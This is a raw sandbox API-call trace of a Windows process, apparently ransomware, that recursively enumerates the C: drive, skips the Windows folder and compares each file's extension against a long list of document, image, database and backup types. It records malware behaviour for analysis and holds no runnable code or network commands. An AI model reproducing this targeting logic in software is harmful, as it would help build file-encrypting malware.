[0037.964] FindNextFileW (in: hFindFile=0x3942ba8, lpFindFileData=0x33df310 | out: lpFindFileData=0x33df310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0037.964] FindClose (in: hFindFile=0x3942ba8 | out: hFindFile=0x3942ba8) returned 1 [0037.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f20088 | out: hHeap=0x600000) returned 1 [0037.964] FindNextFileW (in: hFindFile=0x6f5580, lpFindFileData=0x33df58c | out: lpFindFileData=0x33df58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3f20088 [0037.964] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*", lpFindFileData=0x33df310 | out: lpFindFileData=0x33df310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942ba8 [0037.965] FindNextFileW (in: hFindFile=0x3942ba8, lpFindFileData=0x33df310 | out: lpFindFileData=0x33df310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.966] FindNextFileW (in: hFindFile=0x3942ba8, lpFindFileData=0x33df310 | out: lpFindFileData=0x33df310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA7", cAlternateFileName="")) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3fc40a8 [0037.966] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*", lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942ce8 [0037.966] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.966] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ec0058 [0038.604] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*", lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0038.994] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.994] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1574f00, ftCreationTime.dwHighDateTime=0x1be23e3, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1574f00, ftLastWriteTime.dwHighDateTime=0x1be23e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="FM20.CHM", cAlternateFileName="")) returned 1 Thread: id = 19 os_tid = 0xa0c [0035.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39106d8 [0035.285] lstrlenW (lpString="C:") returned 2 [0035.285] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x351fd00 | out: lpFindFileData=0x351fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6f3470 [0035.285] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0035.285] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0035.285] lstrlenW (lpString="$Recycle.Bin") returned 12 [0035.285] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0035.285] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39206e0 [0035.285] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0035.285] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f34b0 [0035.285] FindNextFileW (in: hFindFile=0x6f34b0, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.286] FindNextFileW (in: hFindFile=0x6f34b0, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0035.286] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0035.286] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0035.286] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0035.286] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0035.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.286] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0035.286] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f44f8 [0035.286] FindNextFileW (in: hFindFile=0x6f44f8, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.286] FindNextFileW (in: hFindFile=0x6f44f8, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0035.286] lstrlenW (lpString="desktop.ini") returned 11 [0035.286] lstrlenW (lpString=".1cd") returned 4 [0035.286] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0035.286] lstrlenW (lpString=".3ds") returned 4 [0035.286] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0035.286] lstrlenW (lpString=".3fr") returned 4 [0035.286] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0035.286] lstrlenW (lpString=".3g2") returned 4 [0035.286] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".3gp") returned 4 [0035.287] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".7z") returned 3 [0035.287] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0035.287] lstrlenW (lpString=".accda") returned 6 [0035.287] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0035.287] lstrlenW (lpString=".accdb") returned 6 [0035.287] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0035.287] lstrlenW (lpString=".accdc") returned 6 [0035.287] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0035.287] lstrlenW (lpString=".accde") returned 6 [0035.287] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0035.287] lstrlenW (lpString=".accdt") returned 6 [0035.287] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0035.287] lstrlenW (lpString=".accdw") returned 6 [0035.287] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0035.287] lstrlenW (lpString=".adb") returned 4 [0035.287] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".adp") returned 4 [0035.287] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".ai") returned 3 [0035.287] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0035.287] lstrlenW (lpString=".ai3") returned 4 [0035.287] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".ai4") returned 4 [0035.287] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".ai5") returned 4 [0035.287] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".ai6") returned 4 [0035.287] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".ai7") returned 4 [0035.287] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".ai8") returned 4 [0035.287] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".anim") returned 5 [0035.287] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0035.287] lstrlenW (lpString=".arw") returned 4 [0035.287] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0035.287] lstrlenW (lpString=".as") returned 3 [0035.287] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0035.288] lstrlenW (lpString=".asa") returned 4 [0035.288] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".asc") returned 4 [0035.288] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".ascx") returned 5 [0035.288] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0035.288] lstrlenW (lpString=".asm") returned 4 [0035.288] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".asmx") returned 5 [0035.288] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0035.288] lstrlenW (lpString=".asp") returned 4 [0035.288] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".aspx") returned 5 [0035.288] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0035.288] lstrlenW (lpString=".asr") returned 4 [0035.288] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".asx") returned 4 [0035.288] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".avi") returned 4 [0035.288] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".avs") returned 4 [0035.288] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".backup") returned 7 [0035.288] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0035.288] lstrlenW (lpString=".bak") returned 4 [0035.288] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".bay") returned 4 [0035.288] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".bd") returned 3 [0035.288] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0035.288] lstrlenW (lpString=".bin") returned 4 [0035.288] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".bmp") returned 4 [0035.288] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".bz2") returned 4 [0035.288] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".c") returned 2 [0035.288] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0035.288] lstrlenW (lpString=".cdr") returned 4 [0035.288] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0035.288] lstrlenW (lpString=".cer") returned 4 [0035.289] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cf") returned 3 [0035.289] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0035.289] lstrlenW (lpString=".cfc") returned 4 [0035.289] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cfm") returned 4 [0035.289] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cfml") returned 5 [0035.289] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0035.289] lstrlenW (lpString=".cfu") returned 4 [0035.289] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".chm") returned 4 [0035.289] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cin") returned 4 [0035.289] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".class") returned 6 [0035.289] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0035.289] lstrlenW (lpString=".clx") returned 4 [0035.289] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".config") returned 7 [0035.289] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0035.289] lstrlenW (lpString=".cpp") returned 4 [0035.289] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cr2") returned 4 [0035.289] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".crt") returned 4 [0035.289] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".crw") returned 4 [0035.289] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cs") returned 3 [0035.289] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0035.289] lstrlenW (lpString=".css") returned 4 [0035.289] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".csv") returned 4 [0035.289] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".cub") returned 4 [0035.289] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".dae") returned 4 [0035.289] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0035.289] lstrlenW (lpString=".dat") returned 4 [0035.289] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".db") returned 3 [0035.290] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0035.290] lstrlenW (lpString=".dbf") returned 4 [0035.290] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dbx") returned 4 [0035.290] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dc3") returned 4 [0035.290] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dcm") returned 4 [0035.290] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dcr") returned 4 [0035.290] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".der") returned 4 [0035.290] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dib") returned 4 [0035.290] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dic") returned 4 [0035.290] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dif") returned 4 [0035.290] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".divx") returned 5 [0035.290] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0035.290] lstrlenW (lpString=".djvu") returned 5 [0035.290] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0035.290] lstrlenW (lpString=".dng") returned 4 [0035.290] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".doc") returned 4 [0035.290] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".docm") returned 5 [0035.290] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0035.290] lstrlenW (lpString=".docx") returned 5 [0035.290] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0035.290] lstrlenW (lpString=".dot") returned 4 [0035.290] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dotm") returned 5 [0035.290] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0035.290] lstrlenW (lpString=".dotx") returned 5 [0035.290] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0035.290] lstrlenW (lpString=".dpx") returned 4 [0035.290] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0035.290] lstrlenW (lpString=".dqy") returned 4 [0035.291] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".dsn") returned 4 [0035.291] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".dt") returned 3 [0035.291] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0035.291] lstrlenW (lpString=".dtd") returned 4 [0035.291] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".dwg") returned 4 [0035.291] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".dwt") returned 4 [0035.291] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".dx") returned 3 [0035.291] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0035.291] lstrlenW (lpString=".dxf") returned 4 [0035.291] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".edml") returned 5 [0035.291] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0035.291] lstrlenW (lpString=".efd") returned 4 [0035.291] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".elf") returned 4 [0035.291] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".emf") returned 4 [0035.291] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".emz") returned 4 [0035.291] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".epf") returned 4 [0035.291] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".eps") returned 4 [0035.291] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".epsf") returned 5 [0035.291] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0035.291] lstrlenW (lpString=".epsp") returned 5 [0035.291] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0035.291] lstrlenW (lpString=".erf") returned 4 [0035.291] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".exr") returned 4 [0035.291] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0035.291] lstrlenW (lpString=".f4v") returned 4 [0035.292] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".fido") returned 5 [0035.292] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0035.292] lstrlenW (lpString=".flm") returned 4 [0035.292] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".flv") returned 4 [0035.292] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".frm") returned 4 [0035.292] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".fxg") returned 4 [0035.292] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".geo") returned 4 [0035.292] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".gif") returned 4 [0035.292] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".grs") returned 4 [0035.292] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".gz") returned 3 [0035.292] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0035.292] lstrlenW (lpString=".h") returned 2 [0035.292] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0035.292] lstrlenW (lpString=".hdr") returned 4 [0035.292] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".hpp") returned 4 [0035.292] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".hta") returned 4 [0035.292] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".htc") returned 4 [0035.292] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".htm") returned 4 [0035.292] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".html") returned 5 [0035.292] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0035.292] lstrlenW (lpString=".icb") returned 4 [0035.292] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".ics") returned 4 [0035.292] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".iff") returned 4 [0035.292] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0035.292] lstrlenW (lpString=".inc") returned 4 [0035.293] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0035.293] lstrlenW (lpString=".indd") returned 5 [0035.293] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0035.293] lstrlenW 